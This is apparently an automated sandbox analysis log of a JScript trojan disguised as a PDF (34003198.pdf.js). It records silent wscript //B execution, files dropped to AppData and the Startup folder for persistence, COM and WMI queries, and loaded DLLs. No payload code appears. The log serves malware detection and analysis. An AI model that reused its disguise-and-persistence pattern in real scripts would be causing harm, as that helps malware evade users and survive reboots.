Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}	Jump to behavior

Wscript called in batch mode (surpress errors)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"	Jump to behavior

Java / VBScript file with very long strings (likely obfuscated code)

Source: 34003198.pdf.js

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal100.troj.expl.evad.winJS@17/6@1/2

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\bCdHGOcGLp.js

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\34003198.pdf.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: pnrpnsp.dll
